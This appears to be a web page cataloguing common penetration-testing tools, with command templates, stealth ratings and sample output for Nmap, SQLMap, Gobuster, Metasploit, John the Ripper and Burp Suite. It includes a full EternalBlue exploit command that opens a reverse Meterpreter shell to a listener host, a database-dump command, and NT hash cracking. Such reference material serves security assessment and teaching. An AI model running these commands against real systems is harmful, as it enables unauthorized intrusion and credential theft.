PENETRATION TESTING ARSENAL

Real-World Security Assessment Platform

Professional Security Tools
Industry-standard penetration testing and security assessment tools

Nmap

Network discovery and security auditing

SCANNING | INFO

Command Template:

nmap -sS -sV -O -A {target}

Real Usage Example:

nmap -sS -sV -O -A -T4 --script=vuln 192.168.1.0/24

Stealth Rating:

6/10

Sample Output:

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-07 10:30 UTC
Nmap scan report for 192.168.1.100
Host is up (0.001s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5
80/tcp   open  http       Apache httpd 2.4.41
135/tcp  open  msrpc      Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds

Host script results:
|_smb-vuln-ms17-010: VULNERABLE:

SQLMap

Automatic SQL injection and database takeover tool

EXPLOITATION | CRITICAL

Command Template:

sqlmap -u '{url}' --dbs --batch

Real Usage Example:

sqlmap -u 'http://testphp.vulnweb.com/artists.php?artist=1' --dbs --tables --dump-all --batch

Stealth Rating:

3/10

Sample Output:

[10:35:42] [INFO] testing connection to the target URL
[10:35:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:35:43] [INFO] testing if the parameter 'artist' is dynamic
[10:35:43] [INFO] confirming that parameter 'artist' is dynamic
[10:35:43] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be injectable
[10:35:43] [INFO] testing for SQL injection on GET parameter 'artist'
[10:35:43] [INFO] GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s):
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 1=1

Gobuster

Directory/file brute-forcer written in Go

RECONNAISSANCE | MEDIUM

Command Template:

gobuster dir -u {url} -w {wordlist}

Real Usage Example:

gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/big.txt -t 50

Stealth Rating:

7/10

Sample Output:

===============================================================
Gobuster v3.6
===============================================================
[+] Url:                     http://192.168.1.100
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 200) [Size: 1834]
/backup               (Status: 301) [Size: 169] [--> http://192.168.1.100/backup/]
/config               (Status: 200) [Size: 0]
/phpmyadmin           (Status: 301) [Size: 169] [--> http://192.168.1.100/phpmyadmin/]
/uploads              (Status: 301) [Size: 169] [--> http://192.168.1.100/uploads/]

Metasploit Framework

Advanced penetration testing platform

EXPLOITATION | CRITICAL

Command Template:

use exploit/{module}; set RHOSTS {target}; exploit

Real Usage Example:

use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.100; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.1.10; exploit

Stealth Rating:

2/10

Sample Output:

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] 192.168.1.100:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.100:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.100:445 - The target is vulnerable.
[*] 192.168.1.100:445 - Connecting to target for exploitation.
[+] 192.168.1.100:445 - Connection established for exploitation.
[*] Sending stage (200774 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.100:49158)

meterpreter >

John the Ripper

Password cracking tool

POST-EXPLOITATION | HIGH

Command Template:

john --wordlist={wordlist} {hashfile}

Real Usage Example:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT hash.txt

Stealth Rating:

8/10

Sample Output:

Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (NT [MD4 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123      (admin)
qwerty           (user1)
admin123         (administrator)
3g 0:00:00:12 DONE (2024-09-07 10:45) 0.2500g/s 8796Kp/s 8796Kc/s 26389KC/s
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

Burp Suite

Web application security testing platform

EXPLOITATION | HIGH

Command Template:

burpsuite --config-file={config}

Real Usage Example:

Intercept HTTP requests, perform manual and automated security testing

Stealth Rating:

9/10

Sample Output:

Proxy Intercept: ON
Intercepted request:
POST /login.php HTTP/1.1
Host: vulnerable-app.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=admin&password=test

Scanner Results:
[HIGH] SQL injection in 'username' parameter
[MEDIUM] Cross-site scripting (XSS) in 'search' parameter
[INFO] Directory listing enabled on /backup/